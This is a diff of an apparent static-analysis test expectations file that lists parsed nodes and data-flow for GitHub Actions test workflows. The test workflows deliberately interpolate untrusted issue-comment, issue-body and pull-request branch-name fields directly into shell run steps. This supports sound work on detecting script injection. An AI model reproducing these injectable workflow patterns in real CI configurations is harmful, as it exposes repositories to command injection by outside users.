@@ -1,6 +1,36 @@ files +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | | .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | yamlNodes +| .github/workflows/expression_nodes.yml:1:1:1:2 | on | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | +| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | +| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | +| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | +| .github/workflows/expression_nodes.yml:5:5:21:47 | runs-on ... -latest | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | +| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | +| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:7:9:7:11 | run | +| .github/workflows/expression_nodes.yml:7:9:8:6 | run: LI ... ody }}' | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... 
ody }}' | +| .github/workflows/expression_nodes.yml:8:9:8:11 | run | +| .github/workflows/expression_nodes.yml:8:9:10:6 | run: \| | +| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:10:9:10:11 | run | +| .github/workflows/expression_nodes.yml:10:9:13:6 | run: \| | +| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:13:9:13:11 | run | +| .github/workflows/expression_nodes.yml:13:9:16:6 | run: > | +| .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:16:9:16:11 | run | +| .github/workflows/expression_nodes.yml:16:9:20:6 | run: \| | +| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:20:9:20:11 | run | +| .github/workflows/expression_nodes.yml:20:9:21:47 | run: "L ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | | .github/workflows/test.yml:1:1:1:2 | on | | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | 
@@ -71,15 +101,47 @@ yamlNodes | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | jobNodes +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | stepNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runExprNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| 
.github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | allUsesNodes | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | 
@@ -93,12 +155,30 @@ jobUsesNodes | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | usesSteps -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | runStepChildren +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:7:11 | run | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... 
ody }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:8:11 | run | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:10:11 | run | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:13:11 | run | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:16:11 | run | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:20:11 | run | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | 
@@ -112,6 +192,45 @@ runStepChildren | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | parentNodes +| .github/workflows/expression_nodes.yml:1:1:1:2 | on | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:3:1:3:4 | jobs | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:4:3:4:14 | echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:5:11 | runs-on | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:4:3:21:47 | echo-chamber: | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:6:5:6:9 | steps | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:7:11 | run | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... 
ody }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... ody }}' | +| .github/workflows/expression_nodes.yml:8:9:8:11 | run | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:10:9:10:11 | run | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:13:9:13:11 | run | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... 
ody }}' | +| .github/workflows/expression_nodes.yml:13:14:15:46 | > | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:16:9:16:11 | run | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:20:9:20:11 | run | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:7:7:21:47 | - run: ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... 
ody }}' | | .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | @@ -124,6 +243,7 @@ parentNodes | .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | | .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | @@ -151,6 +271,7 @@ parentNodes | .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | | .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | 
@@ -160,17 +281,20 @@ parentNodes | .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | | .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | | .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ git ... 
.ref }} | | .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | | .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:4:3:40:53 | job1: | | .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | | .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | Job: job2 | 
@@ -180,72 +304,154 @@ parentNodes | .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | cfgNodes +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1e ... 
ody }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | \| | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | \| | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | > | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | \| | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | "LINE 1 ... ody }}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... 
alue }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:24:17:24:21 | "foo" | -| .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | dfNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... 
iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | exprNodes +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| 
.github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | argumentNodes -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... 
iles }} | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | usesIds | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | nodeLocations +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | 